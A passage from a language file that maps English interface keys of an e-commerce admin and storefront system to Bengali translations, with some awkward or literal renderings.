'addon' => 'অ্যাডন', 'addon_menus' => 'অ্যাডন মেনু', 'address' => 'ঠিকানা', 'address_added_successfully!' => 'ঠিকানা সফলভাবে যুক্ত!', 'address_not_found' => 'ঠিকানা পাওয়া যায় নি', 'address_type' => 'ঠিকানা প্রকার', 'addresses' => 'ঠিকানা', 'admin' => 'অ্যাডমিন', 'admin wallet histori...' => 'অ্যাডমিন ওয়ালেট ইতিহাস ...', 'admin wallets' => 'অ্যাডমিন ওয়ালেট', 'admin@admin.com' => 'admin@admin.com', 'admin_Commission' => 'অ্যাডমিন কমিশন', 'admin_Discount' => 'অ্যাডমিন ছাড়', 'admin_Earning' => 'অ্যাডমিন উপার্জন', 'admin_Earning_Report' => 'অ্যাডমিন আয়ের প্রতিবেদন', 'admin_Login_Page' => 'অ্যাডমিন লগইন পৃষ্ঠা', 'admin_Net_Income' => 'অ্যাডমিন নেট আয়', 'admin_also_rewards_their_top_customers_with_wallet_money' => 'অ্যাডমিন তাদের শীর্ষ গ্রাহকদের ওয়ালেট অর্থ দিয়ে পুরস্কৃত করে', 'admin_approval_for_products' => 'পণ্যগুলির জন্য অ্যাডমিন অনুমোদন', 'admin_approval_for_products_updated_successfully!' => 'পণ্যগুলির জন্য অ্যাডমিন অনুমোদন সফলভাবে আপডেট হয়েছে!', 'admin_bearer' => 'অ্যাডমিন বাহক', 'admin_can_review_the_registration_request_and_approve_or_deny_the_request' => 'অ্যাডমিন নিবন্ধকরণের অনুরোধটি রিভিউ করতে এন্ড অনুরোধটি অনুমোদন বা ডিনাইড করতে পারেন', 'admin_can_set_whether_customers_can_add_money_to_their_wallets_by_enabling_or_disabling_this_button' => 'অ্যাডমিন এই বোতামটি এনাবল বা ডিস্যাবল করে গ্রাহকরা তাদের ওয়ালেটে অর্থ যোগ করতে পারেন কিনা তা সেট করতে পারেন', 'admin_can_set_whether_customers_will_get_loyalty_points_by_enabling_or_disabling_this_button' => 'অ্যাডমিন এই বোতামটি এনাবল বা ডিস্যাবল করে গ্রাহকরা লয়াল্টি পয়েন্ট পাবেন কিনা তা সেট করতে পারেন', 'admin_can_set_whether_customers_will_get_referral_earnings_by_enabling_or_disabling_this_button' => 'অ্যাডমিন সেট করতে পারেন যে গ্রাহকরা এই বোতামটি এনাবল বা ডিস্যাবল করে রেফারেল উপার্জন পাবেন কিনা', 'admin_can_set_whether_customers_will_get_refund_amount_to_wallet_by_enabling_or_disabling_this_button' => 'অ্যাডমিন সেট করতে পারেন যে গ্রাহকরা এই বোতামটি এনাবল বা ডিস্যাবল করে ওয়ালেট রিফান্ডের পরিমাণ পাবেন কিনা', 'admin_can_set_whether_deliveryman_needs_to_upload_the_picture_of_delivery_by_enabling_or_disabling_this_button' => 'এই বোতামটি এনাবল বা ডিস্যাবল করে অ্যাডমিন সেট করতে পারেন যে ডেলিভারিম্যানকে ডেলিভারির ছবি আপলোড করতে হবে কিনা', 'admin_can_set_whether_wallet_will_be_available_on_customer_profile_by_enabling_or_disabling_this_button' => 'অ্যাডমিন এই বোতামটি এনাবল বা ডিস্যাবল করে গ্রাহক প্রোফাইলে ওয়ালেট এভেইল্যাবলে হবে কিনা তা সেট করতে পারেন', 'admin_commission' => 'অ্যাডমিন কমিশন', 'admin_discount' => 'অ্যাডমিন ছাড়', 'admin_login_url' => 'অ্যাডমিন লগইন ইউআরএল', 'admin_net_income' => 'অ্যাডমিন নেট আয়', 'admin_or_Employee_Login' => 'অ্যাডমিন বা কর্মচারী লগইন', 'admin_wallet' => 'অ্যাডমিন ওয়ালেট', 'admin_will_handle_the_shipping_responsibilities_when_you_choose_inhouse_shipping_method' => 'আপনি যখন ইনহাউস শিপিং পদ্ধতিটি পছন্দ করেন তখন অ্যাডমিন শিপিংয়ের দায়িত্বগুলি পরিচালনা করবে', 'after_changing_any_theme_in_the_you_will_a_menu_option_with_the_menu_name.' => 'আপনি মেনু নাম সহ একটি মেনু বিকল্পে কোনও থিম পরিবর্তন করার পরে।', 'after_switching_the_theme_a_menu_will_appear_in_the_side_bar_with_the_theme_name_on_it' => 'থিমটি স্যুইচ করার পরে একটি মেনুতে থিমের নাম সহ পাশের বারে উPOS্থিত হবে', 'after_the_order_is_delivered_total_order_amount_will_be_shown_here' => 'অর্ডার সরবরাহ করার পরে মোট অর্ডার পরিমাণ এখানে প্রদর্শিত হবে', 'after_uploading_products_you_need_to_edit_them_and_set_product_images_and_choices.' => 'পণ্য আপলোড করার পরে আপনাকে সেগুলি এডিট করতে হবে এন্ড পণ্য চিত্র এন্ড পছন্দগুলি সেট করতে হবে।', 'again_click_plus_icon' => 'আবার প্লাস আইকন ক্লিক করুন', 'agent_number' => 'এজেন্ট নম্বর', 'alex' => 'অ্যালেক্স', 'all' => 'সব', 'all_Categories' => 'সব ধরনের', 'all_Category' => 'সমস্ত ক্যাটাগরি', 'all_Pages_Banner' => 'সমস্ত পৃষ্ঠাগুলি ব্যানার', 'all_Pages_Banner ' => 'সমস্ত পৃষ্ঠাগুলির ব্যানার', 'all_Priority' => 'সমস্ত অগ্রাধিকার', 'all_Products' => 'সব পণ্য', 'all_Sellers' => 'সমস্ত বিক্রেতা', 'all_Status' => 'সমস্ত স্ট্যাটাস', 'all_Transaction' => 'সমস্ত ট্রান্সেকশন', 'all_Transactions' => 'সমস্ত ট্রান্সেকশন', 'all_brand' => 'সমস্ত ব্র্যান্ড', 'all_brands' => 'সমস্ত ব্র্যান্ড', 'all_brands_page' => 'সমস্ত ব্র্যান্ড পৃষ্ঠা', 'all_cart_product_list' => 'সমস্ত কার্ট পণ্য তালিকা', 'all_categories' => 'সব ধরনের', 'all_category' => 'সব ধরনের', 'all_copy_right_reserved_©_2023_' => 'সমস্ত অনুলিপি ডান সংরক্ষিত © 2023', 'all_customer' => 'সমস্ত গ্রাহক', 'all_customers' => 'সমস্ত গ্রাহক', 'all_items_were_not_added_to_cart_as_they_are_currently_unavailable_for_purchase!' => 'সমস্ত আইটেম কার্টে যুক্ত করা হয়নি কারণ তারা বর্তমানে ক্রয়ের জন্য আনএভেইল্যাবল!', 'all_product' => 'সমস্ত পণ্য', 'all_products' => 'সব পণ্য', 'all_seller' => 'সমস্ত বিক্রেতা', 'all_sellers' => 'সমস্ত বিক্রেতা', 'all_shop' => 'সব দোকান', 'all_status' => 'সমস্ত স্ট্যাটাস', 'all_store' => 'সমস্ত স্টোর', 'all_stores' => 'সমস্ত স্টোর', 'all_sub_categories' => 'সমস্ত সাব ক্যাটাগরি', 'all_sub_sub_categories' => 'সমস্ত সাব সাব ক্যাটাগরি', 'all_the_promotional_banners_from_the_website_and_user_app_will_be_clear_once_the_theme_is_changed.' => 'ওয়েবসাইট এন্ড ব্যবহারকারী অ্যাপ্লিকেশন থেকে সমস্ত প্রচারমূলক ব্যানার থিমটি পরিবর্তন করার পরে পরিষ্কার হবে।', 'all_wishing_product_list' => 'সমস্ত উইশ পণ্য তালিকা', 'all_your_apps_and_customer_website_will_be_disabled_until_you_turn_this_mode_OFF' => 'আপনি এই মোডটি বন্ধ না করা পর্যন্ত আপনার সমস্ত অ্যাপ্লিকেশন এন্ড গ্রাহক ওয়েবসাইট ডিস্যাবল করা হবে', 'all_your_data_are_safe' => 'আপনার সমস্ত ডেটা নিরাপদ', 'already_Settled' => 'ইতিমধ্যে নিষ্পত্তি', 'already_Withdrawn' => 'ইতিমধ্যে উইথড্র', 'already_added!' => 'ইতিমধ্যে যোগ!', 'already_check' => 'ইতিমধ্যে চেক', 'already_have_an_account _login.' => 'ইতিমধ্যে আপনার একাউন্ট আছে? লগইন করুন.', 'already_have_store ' => 'ইতিমধ্যে স্টোর আছে', 'amount' => 'পরিমাণ', 'amount sucessfully credited to your wallet' => 'পরিমাণ সফলভাবে আপনার ওয়ালেটে জমা হয়েছে', 'amount_can_not_be_negative_or_zero' => 'পরিমাণ নেতিবাচক বা শূন্য হতে পারে না', 'amount_can_not_be_negative_or_zero!' => 'পরিমাণ নেতিবাচক বা শূন্য হতে পারে না!', 'amount_to_be_paid' => 'পরিমাণ অর্থ পেমেন্ট করা হবে', 'an_OTP' => 'একটি ওটিপি', 'analytics' => 'বিশ্লেষণ', 'analytics_script' => 'বিশ্লেষণ স্ক্রিপ্ট', 'and' => 'এন্ড', 'and press' => 'এন্ড প্রেস', 'and_billing' => 'এন্ড বিলিং', 'and_enjoy' => 'এন্ড উপভোগ করুন', 'and_press' => 'এন্ড প্রেস', 'announcement' => 'ঘোষণা', 'announcement_setup' => 'ঘোষণা সেটআপ', 'announcements' => 'ঘোষণা', 'another_address' => 'অন্য ঠিকানা', 'answer' => 'Answer', 'api_ID' => 'এপিআই আইডি', 'api_Key' => 'Api Key', 'api_key' => 'Api key', 'api_secret' => 'এপিআই সিক্রেট', 'app_Download_Link' => 'অ্যাপ্লিকেশন ডাউনলোড লিঙ্ক', 'app_Settings' => 'অ্যাপ সেটিংস', 'app_debug' => 'অ্যাপ ডিবাগ', 'app_download_info' => 'অ্যাপ্লিকেশন ডাউনলোড তথ্য', 'app_mode' => 'অ্যাপ মোড', 'app_name' => 'অ্যাপ্লিকেশন নাম', 'app_settings' => 'অ্যাপ সেটিংস', 'app_store_download_link' => 'অ্যাপ স্টোর ডাউনলোড লিঙ্ক', 'app_url' => 'অ্যাপ্লিকেশন url', 'apple' => 'অ্যাপল', 'apple_developer_account_name' => 'অ্যাপল বিকাশকারী অ্যাকাউন্টের নাম', 'apple_store' => 'অ্যাপল স্টোর', 'apply' => 'প্রয়োগ করুন', 'apply_Shop' => 'দোকান প্রয়োগ করুন', 'apply_code' => 'কোড প্রয়োগ করুন', 'apply_coupon_code' => 'কুপন কোড প্রয়োগ করুন', 'approval_for_products' => 'পণ্য জন্য অনুমোদন', 'approved' => 'অনুমোদিত', 'approved_Products' => 'অনুমোদিত পণ্য', 'approved_note' => 'অনুমোদিত নোট', 'are_you_sure' => 'আপনি কি নিশ্চিত', 'are_you_sure ' => 'আপনি কি নিশ্চিত', 'are_you_sure_Change_this' => 'আপনি কি নিশ্চিত এটি পরিবর্তন', 'are_you_sure_change_this' => 'আপনি কি নিশ্চিত এটি পরিবর্তন', 'are_you_sure_delete_this' => 'আপনি কি নিশ্চিত এটি মুছতে চান?', 'are_you_sure_delete_this_FAQ' => 'আপনি কি নিশ্চিত FAQ মুছতে চান? ', 'are_you_sure_delete_this_banner' => 'আপনি কি নিশ্চিত যে এই ব্যানারটি মুছবেন?', 'are_you_sure_delete_this_brand' => 'আপনি কি নিশ্চিত যে এই ব্র্যান্ডটি মুছবেন?', 'are_you_sure_delete_this_most_demanded_product' => 'আপনি কি নিশ্চিত যে এই সর্বাধিক চাহিদাযুক্ত পণ্যটি মুছবেন?', 'are_you_sure_delete_this_social_media' => 'আপনি কি নিশ্চিত যে এই সোশ্যাল মিডিয়া মুছবেন?', 'are_you_sure_remove_this_product' => 'আপনি কি নিশ্চিত যে এই পণ্যটি সরান?', 'are_you_sure_to_delete_this' => 'আপনি কি এটি মুছতে ভুলবেন না?', 'are_you_sure_you_want_to_delete_the_addon' => 'আপনি কি নিশ্চিত যে আপনি অ্যাডনটি মুছতে চান?', 'are_you_sure_you_want_to_delete_the_theme' => 'আপনি কি থিমটি মুছতে চান তা নিশ্চিত', 'aready_Withdrawn' => 'অলরেডি উইথড্র', 'ask_about_this_product' => 'এই পণ্য সম্পর্কে জিজ্ঞাসা করুন', 'assign' => 'আসসাইন', 'attachment' => 'সংযুক্তি', 'attribute' => 'এট্রিবিউট', 'attribute_Name' => 'নাম গুন', 'attribute_Setup' => 'এট্রিবিউট সেটআপ', 'attribute_deleted_successfully' => 'ফীচার সফলভাবে মুছে ফেলা', 'attribute_list' => 'ফীচার তালিকা', 'attributes' => 'ফীচার', 'audio' => 'শ্রুতি', 'auth_domain' => 'প্রমাণ ডোমেন', 'auth_key' => 'প্রমাণীকরণ কী', 'authentic_payment' => 'খাঁটি অর্থ পেমেন্ট', 'authkey' => 'প্রমাণীকরণ কী', 'authorized_redirect_URIs' => 'অনুমোদিত পুনঃনির্দেশ URI', 'auto_translate' => 'অটো অনুবাদ', 'available' => 'এভেইল্যাবলে', 'available_from_minimum_purchase' => 'সর্বনিম্ন ক্রয় থেকে এভেইল্যাবলে', 'available_variations' => 'এভেইল্যাবলে ভ্যারিয়েশন', 'average' => 'গড়', 'average_Earning_Value' => 'গড় উপার্জনের মান', 'average_Product_Value' => 'গড় পণ্য মান', 'average_Ratings' => 'গড় রেটিং', 'back' => 'পেছনে', 'back_to_seller_list' => 'বিক্রেতার তালিকায় ফিরে যান', 'back_to_shipping' => 'শিপিং ফিরে', 'background_color' => 'পেছনের রং', 'balance' => 'ব্যালেন্স', 'bank' => 'ব্যাংক', 'bank_Info_View' => 'ব্যাংক তথ্য দেখুন', 'bank_Information' => 'ব্যাংক তথ্য', 'bank_Name' => 'ব্যাংকের নাম', 'bank_info' => 'ব্যাংক তথ্য', 'bank_information' => 'ব্যাংক তথ্য', 'bank_name' => 'ব্যাংকের নাম', 'banned_seller' => 'নিষিদ্ধ বিক্রেতা', 'banner' => 'ব্যানার', 'banner about us' => 'এবাউট আস ব্যানার', 'banner cancellation policy' => 'ক্যান্সল্যাশন পলিসি ব্যানার', 'banner faq page' => 'FAQ পৃষ্ঠা ব্যানার', 'banner privacy policy' => 'প্রাইভেসি পলিসি ব্যানার', 'banner refund policy' => 'রিফান্ড পলিসি ব্যানার', 'banner return policy' => 'রিটার্ন পলিসি ব্যানার', 'banner terms conditions' => 'টার্মস এন্ড কন্ডিশন ব্যানার', 'banner_URL' => 'ব্যানার ইউআরএল', 'banner_added_successfully' => 'ব্যানার সফলভাবে যুক্ত হয়েছে', 'banner_deleted_successfully' => 'ব্যানার সফলভাবে মুছে ফেলা হয়েছে', 'banner_form' => 'ব্যানার ফর্ম', 'banner_image' => 'ব্যানার ইমেজ', 'banner_name_is_required' => 'ব্যানার নাম প্রয়োজনীয়', 'banner_photo' => 'ব্যানার ফটো', 'banner_published_successfully' => 'ব্যানার সফলভাবে প্রকাশিত', 'banner_table' => 'ব্যানার টেবিল', 'banner_type' => 'ব্যানার টাইপ', 'banner_unpublished_successfully' => 'ব্যানার সাফল্যের সাথে অপ্রকাশিত', 'banner_update_form' => 'ব্যানার আপডেট ফর্ম', 'banner_updated_successfully' => 'ব্যানার সফলভাবে আপডেট হয়েছে', 'banner_url' => 'ব্যানার ইউআরএল', 'banners' => 'ব্যানার', 'barcode' => 'বারকোড', 'base_URL_of_the_site_ex= ' => 'সাইটের বেস ইউআরএল=>', 'base_url_by_region' => 'বেস ইউআরএল অঞ্চল', 'basic' => 'বেসিক', 'basic_Information' => 'মৌলিক তথ্য', 'be_careful_before_you_turn_on/off_maintenance_mode' => 'আপনি রক্ষণাবেক্ষণ মোড চালু/বন্ধ করার আগে সাবধানতা অবলম্বন করুন', 'be_the_first_one_to_know_about_discounts_offers_and_events' => 'ছাড়ের অফার এন্ড ইভেন্টগুলি সম্পর্কে জানার প্রথমটি হন', 'bearer' => 'বাহক', 'become_a_seller' => 'একজন বিক্রেতা হয়ে উঠুন', 'before_delivered_you_need_to_make_payment_status_paid' => 'ডেলিভারি করার আগে আপনাকে অর্থ পেমেন্ট স্ট্যাটাস পেমেন্ট করা দরকার', 'before_the_seller_confirms_the_order' => 'বিক্রেতা অর্ডারটি নিশ্চিত করার আগে', 'below_Average' => 'গড়ের নীচে', 'best selling' => 'সেরা বিক্রয়', 'best sellings' => 'সেরা বিক্রয়', 'best-selling' => 'সেরা বিক্রয়', 'best_selling' => 'সেরা বিক্রয়', 'best_selling_product' => 'সেরা বিক্রয় পণ্য', 'best_sellings' => 'সেরা বিক্রয়', 'bestsellings' => 'বেস্টসেলিংস', 'billing' => 'বিলিং', 'billing addresses' => 'বিলিং ঠিকানা', 'billing_Section' => 'বিলিং ক্যাটাগরি', 'billing_address' => 'বিলিং ঠিকানা', 'billing_input_by_customer' => 'গ্রাহক দ্বারা বিলিং ইনপুট', 'billing_to' => 'বিলিং থেকে', 'bkash' => 'Bkash', 'block' => 'ব্লক', 'blog' => 'ব্লগ', 'bonus' => 'বোনাস', 'bonus_amount' => 'বোনাস পরিমাণ', 'bonus_info' => 'বোনাস তথ্য', 'bonus_removed_Successfully' => 'বোনাস সফলভাবে সরানো হয়েছে', 'bonus_title' => 'বোনাস শিরোনাম', 'bonus_type' => 'বোনাস টাইপ', 'both_Phone_&_Email_verification_can_not_be_active_at_a_time' => 'উভয় ফোন এন্ড ইমেল ভেরিফিকেশন একবারে সক্রিয় হতে পারে না', 'bottom' => 'নীচে', 'bottom_banner_name_is_required' => 'নীচের ব্যানার নাম প্রয়োজন', 'branch' => 'শাখা', 'branch_Name' => 'শাখার নাম', 'branch_name' => 'শাখার নাম', 'brand' => 'ব্র্যান্ড', 'brand is required!' => 'ব্র্যান্ড প্রয়োজন!', 'brand_Add' => 'ব্র্যান্ড অ্যাড', 'brand_List' => 'ব্র্যান্ড তালিকা', 'brand_Logo' => 'ব্র্যান্ড লোগো', 'brand_Name' => 'পরিচিতিমুলক নাম', 'brand_Setup' => 'ব্র্যান্ড সেটআপ', 'brand_deleted_successfully' => 'ব্র্যান্ড সফলভাবে মুছে ফেলা হয়েছে', 'brand_list' => 'ব্র্যান্ড তালিকা', 'brand_logo' => 'ব্র্যান্ড লোগো', 'brands' => 'ব্র্যান্ড', 'bulk_Import' => 'বাল্ক আমদানি', 'bulk_export' => 'বাল্ক এক্সপোর্ট', 'bulk_import' => 'বাল্ক আমদানি', 'business' => 'ব্যবসা', 'business section' => 'ব্যবসায় ক্যাটাগরি', 'business_Information' => 'বাণিজ্য তথ্য', 'business_Setup' => 'ব্যবসায় সেটআপ', 'business_analytics' => 'বাণিজ্যিক বিশ্লেষণ', 'business_model' => 'ব্যবসায়ের মডেল', 'business_section' => 'ব্যবসায় ক্যাটাগরি', 'business_settings' => 'ব্যবসায়িক সেটিংস', 'business_setup' => 'ব্যবসায় সেটআপ', 'button_admin_can_pause_his_shop_activities_and_his_shop_will_be_shown_as' => 'বোতাম অ্যাডমিন তার দোকানের ক্রিয়াকলাপ বিরতি দিতে পারে এন্ড তার দোকান একাউন্টে প্রদর্শিত হবে', 'button_to_verify_the_SMTP_connection' => 'এসএমটিপি সংযোগ যাচাই করতে বোতাম', 'buy_now' => 'এখন কিনুন', 'buyer_username' => 'ক্রেতা ব্যবহারকারীর নাম', 'by_Turning_OFF_Picture_Upload_on_Delivery' => 'ডেলিভারির ছবি আপলোড বন্ধ করে', 'by_Turning_ON_Guest_Checkout_Mode' => 'অতিথি চেকআউট মোড চালু করে', 'by_Turning_ON_Picture_Upload_on_Delivery' => 'ডেলিভারির ছবি আপলোড চালু করে', 'by_Turning_Off_Guest_Checkout_Mode' => 'অতিথি চেকআউট মোড বন্ধ করে', 'by_admin' => 'অ্যাডমিন দ্বারা', 'by_clicking_sign_up_you_are_agreed_with_our' => 'সাইন আপ ক্লিক করে আপনি আমাদের সাথে একমত', 'by_clicking_sign_up_you_are_agreed_with_our ' => 'সাইন আপ ক্লিক করে আপনি আমাদের সাথে একমত', 'by_review_rating' => 'রিভিউ রেটিং দ্বারা', 'by_self_delivery_man' => 'স্ব ডেলিভারি ম্যান দ্বারা', 'by_seller' => 'বিক্রেতা দ্বারা', 'by_third_party_delivery_service' => 'তৃতীয় পক্ষের ডেলিভারি পরিষেবা দ্বারা', 'by_turning_on_the' => 'চালু করে', 'by_turning_the' => 'ঘুরিয়ে দিয়ে', 'call_us' => 'আমাদের কল', 'callback_URI' => 'কলব্যাক URI', 'can_email_us_at' => 'আমাদের ইমেল করতে পারেন', 'cancel' => 'ক্যানসেল', 'cancel_Order' => 'অর্ডার ক্যানসেল', 'cancel_order' => 'অর্ডার ক্যানসেল', 'canceled' => 'ক্যানসেল', 'canceled_Orders' => 'ক্যানসেল অর্ডার', 'cancellation policy' => 'ক্যান্সল্যাশন পলিসি', 'cancellation_Policy' => 'ক্যান্সল্যাশন পলিসি', 'cancellation_policy' => 'ক্যান্সল্যাশন পলিসি', 'cancelled' => 'ক্যানসেল', 'cannot_Use_0_only' => 'শুধুমাত্র 0 ব্যবহার করতে পারে না', 'captcha' => 'ক্যাপচা', 'card' => 'কার্ড', 'card_holder_email' => 'কার্ড ধারক ইমেল', 'card_holder_name' => 'কার্ডধারীর নাম', 'card_number' => 'কার্ড নম্বর', 'card_nummber' => 'কার্ড নাম্বার', 'card_type' => 'কার্ড এর ধরন', 'cart' => 'কার্ট', 'cart shippings' => 'কার্ট শিপিংস', 'cart_empty' => 'কার্ট খালি', 'cart_list' => 'কার্টের তালিকা', 'cart_updated' => 'কার্ট আপডেট হয়েছে', 'carts' => 'কার্টস', 'cash' => 'ক্যাশ', 'cash on delivery' => 'ক্যাশ অন ডেলিভারি', 'cash_Payment' => 'ক্যাশে টাকা পেমেন্ট', 'cash_Payments' => 'ক্যাশ অর্থ পেমেন্ট', 'cash_on_delivery' => 'ক্যাশ অন ডেলিভারি', 'cash_payment' => 'ক্যাশে টাকা পেমেন্ট', 'cash_payments' => 'ক্যাশ অর্থ পেমেন্ট', 'categories' => 'ক্যাটাগরি', 'category' => 'ক্যাটাগরি', 'category is required!' => 'ক্যাটাগরি প্রয়োজন!', 'category shipping co...' => 'ক্যাটাগরি শিপিং কো ...', 'category wise' => 'ক্যাটাগরি ', 'category_Image' => 'ক্যাটাগরি চিত্র', 'category_Logo' => 'ক্যাটাগরি লোগো', 'category_Name' => 'ক্যাটাগরি নাম', 'category_Setup' => 'ক্যাটাগরি সেটআপ', 'category_deleted_successfully.' => 'ক্যাটাগরি সফলভাবে মুছে ফেলা হয়েছে।', 'category_form' => 'ক্যাটাগরি ফর্ম', 'category_list' => 'ক্যাটাগরি তালিকা', 'category_name' => 'ক্যাটাগরি নাম', 'category_table' => 'ক্যাটাগরি সারণী', 'category_tag' => 'ক্যাটাগরি ট্যাগ', 'category_wise' => 'ক্যাটাগরি ', 'category_wise_shipping_cost' => 'ক্যাটাগরি অনুসারে শিপিং ব্যয়', 'cccc' => 'সিসিসিসি', 'change_by' => 'দ্বারা পরিবর্তন', 'change_order_status' => 'ক্রমের স্ট্যাটাস পরিবর্তন করুন', 'change_refund_status' => 'রিফান্ডের স্ট্যাটাস পরিবর্তন করুন', 'change_status_to_paid' => 'অর্থ পেমেন্ট স্ট্যাটাস পরিবর্তন করুন', 'change_your_password' => 'আপনার পাসওয়ার্ড পরিবর্তন করুন', 'change_your_password_in_three_easy_steps.' => 'তিনটি সহজ পদক্ষেপে আপনার পাসওয়ার্ড পরিবর্তন করুন।', 'change_your_profile' => 'আপনার প্রোফাইল পরিবর্তন করুন', 'changed_by' => 'দ্বারা পরিবর্তিত', 'changes' => 'পরিবর্তন', 'changing_some_settings_will_take_time_to_show_effect_please_clear_session_or_wait_for_60_minutes_else_browse_from_incognito_mode' => 'কিছু সেটিংস পরিবর্তন করলে প্রভাব দেখাতে সময় লাগবে অনুগ্রহ করে সেশন সাফ করুন অথবা 60 মিনিট অপেক্ষা করুন অন্যথা ছদ্মবেশী মোড থেকে ব্রাউজ করুন', 'chat' => 'চ্যাট', 'chat_with_delivery-man' => 'ডেলিভারি-ম্যানের সাথে চ্যাট করুন', 'chat_with_delivery_man' => 'ডেলিভারি ম্যানের সাথে চ্যাট করুন', 'chat_with_deliveryman' => 'ডেলিভারিম্যানের সাথে চ্যাট করুন', 'chat_with_seller' => 'বিক্রেতার সাথে চ্যাট করুন', 'chatbox' => 'চ্যাট বক্স', 'chatting_List' => 'চ্যাট তালিকা', 'chatting_Page' => 'চ্যাট পৃষ্ঠা', 'chattings' => 'চ্যাটিং', 'check' => 'চেক করুন', 'check in' => 'চেক ইন', 'check_All_CartList' => 'সমস্ত কার্টলিস্ট চেক করুন', 'check_All_Wishlist' => 'সমস্ত উইশ লিস্ট চেক করুন', 'check_Minimum_Order_Amount_Requirment' => 'সর্বনিম্ন অর্ডার পরিমাণের প্রয়োজনীয়তা চেক করুন', 'check_My_All_Orders' => 'আমার সমস্ত অর্ডার চেক করুন', 'check_Please' => 'চেক করে দেখুন', 'check_all_order' => 'সমস্ত অর্ডার চেক করুন', 'check_in_Accept_the_reCAPTCHA_Terms_of_Service' => 'চেক ইন করুন পরিষেবার রিক্যাপচা টার্মস গ্রহণ করুন ', 'check_now' => 'এখন দেখ', 'check_orders' => 'অর্ডার চেক করুন', 'check_please' => 'চেক করে দেখুন', 'check_your_email' => 'আপনার ইমেইল চেক করুন', 'checkout' => 'চেকআউট', 'checkout_details' => 'চেকআউট ডিটেলস', 'choice_Title' => 'পছন্দ শিরোনাম', 'choose' => 'পছন্দ করা', 'choose_File' => 'ফাইল পছন্দ করুন', 'choose_Payment_Method' => 'পরিশোধের পদ্ধতি নির্বাচন করুন', 'choose_billing_address' => 'বিলিং ঠিকানা পছন্দ করুন', 'choose_customer' => 'গ্রাহক পছন্দ করুন', 'choose_delivery_man' => 'ডেলিভারি ম্যান পছন্দ করুন', 'choose_delivery_type' => 'ডেলিভারি প্রকার পছন্দ করুন', 'choose_environment' => 'পরিবেশ পছন্দ করুন', 'choose_file' => 'ফাইল পছন্দ কর', 'choose_payment' => 'অর্থ পেমেন্ট পছন্দ করুন', 'choose_priority' => 'অগ্রাধিকার পছন্দ করুন', 'choose_priority_number' => 'অগ্রাধিকার নম্বর পছন্দ করুন', 'choose_product' => 'পণ্য পছন্দ করুন', 'choose_shipping_address' => 'শিপিং ঠিকানা পছন্দ করুন', 'choose_shipping_method' => 'শিপিং পদ্ধতি পছন্দ করুন', 'choose_the_appropriate_encryption_method' => 'উপযুক্ত এনক্রিপশন পদ্ধতি পছন্দ করুন', 'choose_updated_file' => 'আপডেট হওয়া ফাইল পছন্দ করুন', 'city' => 'শহর', 'clean_database' => 'পরিষ্কার ডাটাবেস', 'clear' => 'পরিষ্কার', 'clear_all' => 'সব পরিষ্কার করে দাও', 'clear_cart' => 'কার্ট খালি করুন', 'click' => 'ক্লিক', 'click_continue_and_download_the_file_in_device_named_AuthKey_ID.p8_(store_it_safely_and_it_is_used_for_push_notification)' => ' ক্লিক করুন এন্ড অ্যাথকি আইডি.পি 8 নামের ডিভাইসে ফাইলটি ডাউনলোড করুন (এটি নিরাপদে সেভ করুন এন্ড এটি পুশ নোটিফিকেশনর জন্য ব্যবহৃত হয়)', 'click_here' => 'এখানে ক্লিক করুন', 'click_on_continue' => 'চালিয়ে যান ক্লিক করুন', 'click_on_the' => 'ক্লিক করুন', 'click_on_the_map_to_see_your_location_latitude' => 'আপনার লোকেশন অক্ষাংশ দেখতে মানচিত্রে ক্লিক করুন', 'click_on_the_map_to_see_your_location_longitude' => 'আপনার লোকেশন দ্রাঘিমাংশ দেখতে মানচিত্রে ক্লিক করুন', 'click_plus_icon' => 'প্লাস আইকন ক্লিক করুন', 'client' => 'ক্লায়েন্ট', 'client_ID' => 'ক্লায়েন্ট আইডি', 'client_OAuth_Login' => 'ক্লায়েন্ট OAuth লগইন', 'client_Secret' => 'ক্লায়েন্ট সিক্রেট', 'client_id' => 'ক্লায়েন্ট আইডি', 'client_secret' => 'ক্লায়েন্ট সিক্রেট', 'close' => 'বন্ধ', 'close_for_now' => 'আপাতত বন্ধ', 'close_now' => 'এখন বন্ধ করুন', 'close_this_ticket' => 'এই টিকিট বন্ধ করুন', 'close_ticket' => 'বন্ধ টিকিট', 'closed_for_now' => 'আপাতত বন্ধ', 'closed_now' => 'এখন বন্ধ', 'code' => 'কোড', 'codecanyon_username' => 'কোডক্যানিয়ন ব্যবহারকারীর নাম', 'collect_coupons_from_stores_and_apply_to_get_special_discount_from_stores' => 'স্টোর থেকে কুপন সংগ্রহ করুন এন্ড স্টোর থেকে বিশেষ ছাড় পেতে আবেদন করুন', 'collected_cash' => 'সংগ্রহ ক্যাশ', 'color' => 'রঙ', 'color image' => 'রঙ চিত্র', 'color wise image' => 'রঙ অনুসারে চিত্র', 'color_variant' => 'রঙ বৈকল্পিক', 'colors' => 'রঙ', 'colour_wise_product_image' => 'রঙ অনুসারে পণ্য চিত্র', 'come_back_soon' => 'শীঘ্রই ফিরে এসো', 'comission' => 'কমিশন', 'comment' => 'মন্তব্য', 'commission' => 'কমিশন', 'commission_Earning' => 'কমিশন উপার্জন', 'commission_Given' => 'কমিশন দেওয়া হয়েছে', 'commission_earned' => 'কমিশন উপার্জন', 'commission_given' => 'কমিশন দেওয়া হয়েছে', 'company' => 'প্রতিষ্ঠান', 'company_ID' => 'কোম্পানি আইডি', 'company_Information' => 'কোম্পানির তথ্য', 'company_Name' => 'কোমপানির নাম', 'company_address' => 'প্রতিস্থান এর ঠিকানা', 'company_copyright_text' => 'কোম্পানির কপিরাইট টেক্সট', 'compare' => 'কম্পেয়ার করা', 'compare_list_Removed' => 'তালিকা অপসারণ করা কম্পেয়ার করুন', 'complaint' => 'অভিযোগ', 'complete_Registration' => 'সম্পূর্ণ নিবন্ধন', 'complete_the_add_details_form_and_press' => 'ডিটেলস যুক্ত ফর্ম এন্ড প্রেস সম্পূর্ণ করুন', 'completed' => 'সম্পূর্ণ', 'completed_Orders' => 'অর্ডার সম্পূর্ণ', 'completed_payments' => 'সম্পূর্ণ অর্থ পেমেন্ট', 'config_data_updated' => 'কনফিগার ডেটা আপডেট হয়েছে', 'configuration_invalid' => 'কনফিগারেশন ইনভ্যালিড', 'configure' => 'কনফিগার', 'configure_SMTP_settings' => 'এসএমটিপি সেটিংস কনফিগার করুন', 'confirm_Email' => 'নিশ্চিত ইমেইল', 'confirm_it_works_perfectly' => 'নিশ্চিত করুন এটি পুরোপুরি কাজ করে', 'confirm_password' => 'পাসওয়ার্ড নিশ্চিত করুন', 'confirm_your_new_password' => 'আপনার নতুন পাসওয়ার্ড নিশ্চিত করুন', 'confirmed' => 'কনফার্মড', 